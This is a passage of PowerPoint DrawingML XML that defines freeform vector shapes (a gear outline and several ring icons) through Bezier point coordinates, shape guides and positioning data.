                    <a:pt x="655" y="195"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="670" y="180"/>
                    <a:pt x="670" y="180"/>
                    <a:pt x="670" y="180"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="670" y="176"/>
                    <a:pt x="670" y="176"/>
                    <a:pt x="670" y="176"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="620" y="126"/>
                    <a:pt x="620" y="126"/>
                    <a:pt x="620" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="620" y="126"/>
                    <a:pt x="616" y="126"/>
                    <a:pt x="616" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="601" y="142"/>
                    <a:pt x="601" y="142"/>
                    <a:pt x="601" y="142"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="584" y="158"/>
                    <a:pt x="557" y="162"/>
                    <a:pt x="536" y="150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="517" y="139"/>
                    <a:pt x="497" y="130"/>
                    <a:pt x="476" y="125"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="453" y="118"/>
                    <a:pt x="437" y="97"/>
                    <a:pt x="437" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="437" y="53"/>
                    <a:pt x="437" y="53"/>
                    <a:pt x="437" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="437" y="52"/>
                    <a:pt x="436" y="50"/>
                    <a:pt x="434" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="363" y="50"/>
                    <a:pt x="363" y="50"/>
                    <a:pt x="363" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="362" y="50"/>
                    <a:pt x="361" y="52"/>
                    <a:pt x="361" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="361" y="73"/>
                    <a:pt x="361" y="73"/>
                    <a:pt x="361" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="361" y="97"/>
                    <a:pt x="345" y="118"/>
                    <a:pt x="322" y="125"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="308" y="128"/>
                    <a:pt x="294" y="121"/>
                    <a:pt x="290" y="107"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="286" y="94"/>
                    <a:pt x="294" y="80"/>
                    <a:pt x="307" y="76"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="308" y="76"/>
                    <a:pt x="310" y="75"/>
                    <a:pt x="310" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="310" y="53"/>
                    <a:pt x="310" y="53"/>
                    <a:pt x="310" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="310" y="24"/>
                    <a:pt x="334" y="0"/>
                    <a:pt x="363" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="434" y="0"/>
                    <a:pt x="434" y="0"/>
                    <a:pt x="434" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="464" y="0"/>
                    <a:pt x="488" y="24"/>
                    <a:pt x="488" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="488" y="73"/>
                    <a:pt x="488" y="73"/>
                    <a:pt x="488" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="488" y="75"/>
                    <a:pt x="489" y="76"/>
                    <a:pt x="490" y="76"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="514" y="83"/>
                    <a:pt x="538" y="93"/>
                    <a:pt x="561" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="562" y="107"/>
                    <a:pt x="564" y="107"/>
                    <a:pt x="565" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="580" y="90"/>
                    <a:pt x="580" y="90"/>
                    <a:pt x="580" y="90"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="600" y="70"/>
                    <a:pt x="635" y="70"/>
                    <a:pt x="656" y="90"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="706" y="140"/>
                    <a:pt x="706" y="140"/>
                    <a:pt x="706" y="140"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="716" y="151"/>
                    <a:pt x="721" y="164"/>
                    <a:pt x="721" y="178"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="721" y="192"/>
                    <a:pt x="716" y="206"/>
                    <a:pt x="706" y="216"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="690" y="231"/>
                    <a:pt x="690" y="231"/>
                    <a:pt x="690" y="231"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="689" y="232"/>
                    <a:pt x="690" y="234"/>
                    <a:pt x="690" y="235"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="704" y="258"/>
                    <a:pt x="714" y="282"/>
                    <a:pt x="721" y="307"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="721" y="308"/>
                    <a:pt x="722" y="310"/>
                    <a:pt x="724" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="744" y="310"/>
                    <a:pt x="744" y="310"/>
                    <a:pt x="744" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="774" y="310"/>
                    <a:pt x="797" y="334"/>
                    <a:pt x="797" y="363"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="797" y="434"/>
                    <a:pt x="797" y="434"/>
                    <a:pt x="797" y="434"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="797" y="463"/>
                    <a:pt x="774" y="487"/>
                    <a:pt x="744" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="724" y="487"/>
                    <a:pt x="724" y="487"/>
                    <a:pt x="724" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="722" y="487"/>
                    <a:pt x="721" y="489"/>
                    <a:pt x="721" y="490"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="714" y="514"/>
                    <a:pt x="704" y="538"/>
                    <a:pt x="691" y="560"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="691" y="562"/>
                    <a:pt x="690" y="563"/>
                    <a:pt x="691" y="564"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="706" y="579"/>
                    <a:pt x="706" y="579"/>
                    <a:pt x="706" y="579"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="716" y="589"/>
                    <a:pt x="721" y="602"/>
                    <a:pt x="721" y="616"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="721" y="631"/>
                    <a:pt x="716" y="644"/>
                    <a:pt x="706" y="654"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="656" y="704"/>
                    <a:pt x="656" y="704"/>
                    <a:pt x="656" y="704"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="636" y="724"/>
                    <a:pt x="601" y="724"/>
                    <a:pt x="580" y="704"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="566" y="690"/>
                    <a:pt x="566" y="690"/>
                    <a:pt x="566" y="690"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="565" y="689"/>
                    <a:pt x="564" y="690"/>
                    <a:pt x="563" y="690"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="539" y="703"/>
                    <a:pt x="515" y="714"/>
                    <a:pt x="490" y="721"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="489" y="721"/>
                    <a:pt x="488" y="722"/>
                    <a:pt x="488" y="723"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="488" y="744"/>
                    <a:pt x="488" y="744"/>
                    <a:pt x="488" y="744"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="488" y="773"/>
                    <a:pt x="464" y="797"/>
                    <a:pt x="434" y="7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91" name="Freeform 103">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C9F7EA4-D1DA-F049-82C7-DA1B2034FFA4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="22453600" y="155575"/>
              <a:ext cx="106363" cy="104775"/>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50 h 252"/>
                <a:gd name="T12" fmla="*/ 50 w 252"/>
                <a:gd name="T13" fmla="*/ 126 h 252"/>
                <a:gd name="T14" fmla="*/ 126 w 252"/>
                <a:gd name="T15" fmla="*/ 202 h 252"/>
                <a:gd name="T16" fmla="*/ 202 w 252"/>
                <a:gd name="T17" fmla="*/ 126 h 252"/>
                <a:gd name="T18" fmla="*/ 126 w 252"/>
                <a:gd name="T19" fmla="*/ 5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6"/>
                    <a:pt x="0" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="56"/>
                    <a:pt x="56" y="0"/>
                    <a:pt x="126" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="195" y="0"/>
                    <a:pt x="252" y="56"/>
                    <a:pt x="252" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="252" y="196"/>
                    <a:pt x="195" y="252"/>
                    <a:pt x="126" y="252"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="126" y="50"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="50"/>
                    <a:pt x="50" y="84"/>
                    <a:pt x="50" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="168"/>
                    <a:pt x="84" y="202"/>
                    <a:pt x="126" y="202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="202"/>
                    <a:pt x="202" y="168"/>
                    <a:pt x="202" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="84"/>
                    <a:pt x="168" y="50"/>
                    <a:pt x="126"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92" name="Freeform 104">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8254F29A-FDB0-A34B-A663-0BB48380762B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="22453600" y="776288"/>
              <a:ext cx="106363" cy="106363"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 126 w 252"/>
                <a:gd name="T1" fmla="*/ 252 h 252"/>
                <a:gd name="T2" fmla="*/ 0 w 252"/>
                <a:gd name="T3" fmla="*/ 126 h 252"/>
                <a:gd name="T4" fmla="*/ 126 w 252"/>
                <a:gd name="T5" fmla="*/ 0 h 252"/>
                <a:gd name="T6" fmla="*/ 252 w 252"/>
                <a:gd name="T7" fmla="*/ 126 h 252"/>
                <a:gd name="T8" fmla="*/ 126 w 252"/>
                <a:gd name="T9" fmla="*/ 252 h 252"/>
                <a:gd name="T10" fmla="*/ 126 w 252"/>
                <a:gd name="T11" fmla="*/ 50 h 252"/>
                <a:gd name="T12" fmla="*/ 50 w 252"/>
                <a:gd name="T13" fmla="*/ 126 h 252"/>
                <a:gd name="T14" fmla="*/ 126 w 252"/>
                <a:gd name="T15" fmla="*/ 202 h 252"/>
                <a:gd name="T16" fmla="*/ 202 w 252"/>
                <a:gd name="T17" fmla="*/ 126 h 252"/>
                <a:gd name="T18" fmla="*/ 126 w 252"/>
                <a:gd name="T19" fmla="*/ 5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252">
                  <a:moveTo>
                    <a:pt x="126" y="252"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="252"/>
                    <a:pt x="0" y="196"/>
                    <a:pt x="0" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="56"/>
                    <a:pt x="56" y="0"/>
                    <a:pt x="126" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="195" y="0"/>
                    <a:pt x="252" y="56"/>
                    <a:pt x="252" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="252" y="196"/>
                    <a:pt x="195" y="252"/>
                    <a:pt x="126" y="252"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="126" y="50"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="50"/>
                    <a:pt x="50" y="84"/>
                    <a:pt x="50" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="168"/>
                    <a:pt x="84" y="202"/>
                    <a:pt x="126" y="202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="202"/>
                    <a:pt x="202" y="168"/>
                    <a:pt x="202" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="84"/>
                    <a:pt x="168" y="50"/>
                    <a:pt x="126"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93" name="Freeform 105">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CA93B82-ABA0-854E-AEA1-A143D9210695}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="22142450" y="465138"/>
              <a:ext cx="106363" cy="106363"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 126 w 253"/>
                <a:gd name="T1" fmla="*/ 253 h 253"/>
                <a:gd name="T2" fmla="*/ 0 w 253"/>
                <a:gd name="T3" fmla="*/ 127 h 253"/>
                <a:gd name="T4" fmla="*/ 126 w 253"/>
                <a:gd name="T5" fmla="*/ 0 h 253"/>
                <a:gd name="T6" fmla="*/ 253 w 253"/>
                <a:gd name="T7" fmla="*/ 127 h 253"/>
                <a:gd name="T8" fmla="*/ 126 w 253"/>
                <a:gd name="T9" fmla="*/ 253 h 253"/>
                <a:gd name="T10" fmla="*/ 126 w 253"/>
                <a:gd name="T11" fmla="*/ 51 h 253"/>
                <a:gd name="T12" fmla="*/ 51 w 253"/>
                <a:gd name="T13" fmla="*/ 127 h 253"/>
                <a:gd name="T14" fmla="*/ 126 w 253"/>
                <a:gd name="T15" fmla="*/ 202 h 253"/>
                <a:gd name="T16" fmla="*/ 202 w 253"/>
                <a:gd name="T17" fmla="*/ 127 h 253"/>
                <a:gd name="T18" fmla="*/ 126 w 253"/>
                <a:gd name="T19" fmla="*/ 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253">
                  <a:moveTo>
                    <a:pt x="126" y="253"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="253"/>
                    <a:pt x="0" y="196"/>
                    <a:pt x="0" y="127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="57"/>
                    <a:pt x="57" y="0"/>
                    <a:pt x="126" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="0"/>
                    <a:pt x="253" y="57"/>
                    <a:pt x="253" y="127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="253" y="196"/>
                    <a:pt x="196" y="253"/>
                    <a:pt x="126" y="253"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="126" y="51"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="51"/>
                    <a:pt x="51" y="85"/>
                    <a:pt x="51" y="127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="168"/>
                    <a:pt x="85" y="202"/>
                    <a:pt x="126" y="202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="202"/>
                    <a:pt x="202" y="168"/>
                    <a:pt x="202" y="127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="85"/>
                    <a:pt x="168" y="51"/>
                    <a:pt x="126"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94" name="Freeform 106">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D23FB6F8-CBE1-0C4E-9E61-8C86403A068F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="22764750" y="465138"/>
              <a:ext cx="106363" cy="106363"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 126 w 253"/>
                <a:gd name="T1" fmla="*/ 253 h 253"/>
                <a:gd name="T2" fmla="*/ 0 w 253"/>
                <a:gd name="T3" fmla="*/ 127 h 253"/>
                <a:gd name="T4" fmla="*/ 126 w 253"/>
                <a:gd name="T5" fmla="*/ 0 h 253"/>
                <a:gd name="T6" fmla="*/ 253 w 253"/>
                <a:gd name="T7" fmla="*/ 127 h 253"/>
                <a:gd name="T8" fmla="*/ 126 w 253"/>
                <a:gd name="T9" fmla="*/ 253 h 253"/>
                <a:gd name="T10" fmla="*/ 126 w 253"/>
                <a:gd name="T11" fmla="*/ 51 h 253"/>
                <a:gd name="T12" fmla="*/ 51 w 253"/>
                <a:gd name="T13" fmla="*/ 127 h 253"/>
                <a:gd name="T14" fmla="*/ 126 w 253"/>
                <a:gd name="T15" fmla="*/ 202 h 253"/>
                <a:gd name="T16" fmla="*/ 202 w 253"/>
                <a:gd name="T17" fmla="*/ 127 h 253"/>
                <a:gd name="T18" fmla="*/ 126 w 253"/>
                <a:gd name="T19" fmla="*/ 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3" h="253">
                  <a:moveTo>
                    <a:pt x="126" y="253"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="253"/>
                    <a:pt x="0" y="196"/>
                    <a:pt x="0" y="127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="57"/>
                    <a:pt x="57" y="0"/>
                    <a:pt x="126" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="0"/>
                    <a:pt x="253" y="57"/>
                    <a:pt x="253" y="127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="253" y="196"/>
                    <a:pt x="196" y="253"/>
                    <a:pt x="126" y="253"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="126" y="51"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="51"/>
                    <a:pt x="51" y="85"/>
                    <a:pt x="51" y="127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="168"/>
                    <a:pt x="85" y="202"/>
                    <a:pt x="126" y="202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="202"/>
                    <a:pt x="202" y="168"/>
                    <a:pt x="202" y="127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="85"/>
                    <a:pt x="168" y="51"/>
                    <a:pt x="126"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95" name="Freeform 107">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E92E731B-4C4B-E84A-8962-F6ACB9C3135C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="22232938" y="246063"/>
              <a:ext cx="106363" cy="104775"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 126 w 253"/>
                <a:gd name="T1" fmla="*/ 252 h 252"/>
                <a:gd name="T2" fmla="*/ 37 w 253"/>
                <a:gd name="T3" fmla="*/ 215 h 252"/>
                <a:gd name="T4" fmla="*/ 0 w 253"/>
                <a:gd name="T5" fmla="*/ 126 h 252"/>
                <a:gd name="T6" fmla="*/ 37 w 253"/>
                <a:gd name="T7" fmla="*/ 37 h 252"/>
                <a:gd name="T8" fmla="*/ 126 w 253"/>
                <a:gd name="T9" fmla="*/ 0 h 252"/>
                <a:gd name="T10" fmla="*/ 216 w 253"/>
                <a:gd name="T11" fmla="*/ 37 h 252"/>
                <a:gd name="T12" fmla="*/ 216 w 253"/>
                <a:gd name="T13" fmla="*/ 37 h 252"/>
                <a:gd name="T14" fmla="*/ 216 w 253"/>
                <a:gd name="T15" fmla="*/ 37 h 252"/>
                <a:gd name="T16" fmla="*/ 253 w 253"/>
                <a:gd name="T17" fmla="*/ 126 h 252"/>
                <a:gd name="T18" fmla="*/ 216 w 253"/>
                <a:gd name="T19" fmla="*/ 215 h 252"/>
                <a:gd name="T20" fmla="*/ 126 w 253"/>
                <a:gd name="T21" fmla="*/ 252 h 252"/>
                <a:gd name="T22" fmla="*/ 126 w 253"/>
                <a:gd name="T23" fmla="*/ 51 h 252"/>
                <a:gd name="T24" fmla="*/ 73 w 253"/>
                <a:gd name="T25" fmla="*/ 73 h 252"/>
                <a:gd name="T26" fmla="*/ 51 w 253"/>
                <a:gd name="T27" fmla="*/ 126 h 252"/>
                <a:gd name="T28" fmla="*/ 73 w 253"/>
                <a:gd name="T29" fmla="*/ 180 h 252"/>
                <a:gd name="T30" fmla="*/ 180 w 253"/>
                <a:gd name="T31" fmla="*/ 180 h 252"/>
                <a:gd name="T32" fmla="*/ 202 w 253"/>
                <a:gd name="T33" fmla="*/ 126 h 252"/>
                <a:gd name="T34" fmla="*/ 180 w 253"/>
                <a:gd name="T35" fmla="*/ 73 h 252"/>
                <a:gd name="T36" fmla="*/ 180 w 253"/>
                <a:gd name="T37" fmla="*/ 73 h 252"/>
                <a:gd name="T38" fmla="*/ 126 w 253"/>
                <a:gd name="T39" fmla="*/ 5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3" h="252">
                  <a:moveTo>
                    <a:pt x="126" y="252"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="93" y="252"/>
                    <a:pt x="61" y="239"/>
                    <a:pt x="37" y="215"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="192"/>
                    <a:pt x="0" y="160"/>
                    <a:pt x="0" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="92"/>
                    <a:pt x="13" y="61"/>
                    <a:pt x="37" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="13"/>
                    <a:pt x="93" y="0"/>
                    <a:pt x="126" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="0"/>
                    <a:pt x="192" y="13"/>
                    <a:pt x="216" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="216" y="37"/>
                    <a:pt x="216" y="37"/>
                    <a:pt x="216" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="216" y="37"/>
                    <a:pt x="216" y="37"/>
                    <a:pt x="216" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="240" y="61"/>
                    <a:pt x="253" y="92"/>
                    <a:pt x="253" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="253" y="160"/>
                    <a:pt x="240" y="192"/>
                    <a:pt x="216" y="215"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="239"/>
                    <a:pt x="160" y="252"/>
                    <a:pt x="126" y="252"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="126" y="51"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="51"/>
                    <a:pt x="87" y="58"/>
                    <a:pt x="73" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="87"/>
                    <a:pt x="51" y="106"/>
                    <a:pt x="51" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="146"/>
                    <a:pt x="59" y="165"/>
                    <a:pt x="73" y="180"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="208"/>
                    <a:pt x="151" y="208"/>
                    <a:pt x="180" y="180"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="165"/>
                    <a:pt x="202" y="146"/>
                    <a:pt x="202" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="106"/>
                    <a:pt x="194" y="87"/>
                    <a:pt x="180" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="73"/>
                    <a:pt x="180" y="73"/>
                    <a:pt x="180" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="166" y="58"/>
                    <a:pt x="147" y="51"/>
                    <a:pt x="126"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96" name="Freeform 108">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{013F8452-CA17-4244-B37B-50607F88A1EE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="22674263" y="679450"/>
              <a:ext cx="106363" cy="111125"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 126 w 253"/>
                <a:gd name="T1" fmla="*/ 265 h 265"/>
                <a:gd name="T2" fmla="*/ 37 w 253"/>
                <a:gd name="T3" fmla="*/ 228 h 265"/>
                <a:gd name="T4" fmla="*/ 0 w 253"/>
                <a:gd name="T5" fmla="*/ 139 h 265"/>
                <a:gd name="T6" fmla="*/ 37 w 253"/>
                <a:gd name="T7" fmla="*/ 50 h 265"/>
                <a:gd name="T8" fmla="*/ 216 w 253"/>
                <a:gd name="T9" fmla="*/ 50 h 265"/>
                <a:gd name="T10" fmla="*/ 253 w 253"/>
                <a:gd name="T11" fmla="*/ 139 h 265"/>
                <a:gd name="T12" fmla="*/ 216 w 253"/>
                <a:gd name="T13" fmla="*/ 228 h 265"/>
                <a:gd name="T14" fmla="*/ 126 w 253"/>
                <a:gd name="T15" fmla="*/ 265 h 265"/>
                <a:gd name="T16" fmla="*/ 126 w 253"/>
                <a:gd name="T17" fmla="*/ 63 h 265"/>
                <a:gd name="T18" fmla="*/ 73 w 253"/>
                <a:gd name="T19" fmla="*/ 85 h 265"/>
                <a:gd name="T20" fmla="*/ 51 w 253"/>
                <a:gd name="T21" fmla="*/ 139 h 265"/>
                <a:gd name="T22" fmla="*/ 73 w 253"/>
                <a:gd name="T23" fmla="*/ 192 h 265"/>
                <a:gd name="T24" fmla="*/ 180 w 253"/>
                <a:gd name="T25" fmla="*/ 192 h 265"/>
                <a:gd name="T26" fmla="*/ 202 w 253"/>
                <a:gd name="T27" fmla="*/ 139 h 265"/>
                <a:gd name="T28" fmla="*/ 180 w 253"/>
                <a:gd name="T29" fmla="*/ 85 h 265"/>
                <a:gd name="T30" fmla="*/ 126 w 253"/>
                <a:gd name="T31" fmla="*/ 6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3" h="265">
                  <a:moveTo>
                    <a:pt x="126" y="265"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="265"/>
                    <a:pt x="62" y="253"/>
                    <a:pt x="37" y="228"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="204"/>
                    <a:pt x="0" y="173"/>
                    <a:pt x="0" y="139"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="105"/>
                    <a:pt x="13" y="73"/>
                    <a:pt x="37" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="0"/>
                    <a:pt x="166" y="0"/>
                    <a:pt x="216" y="50"/>
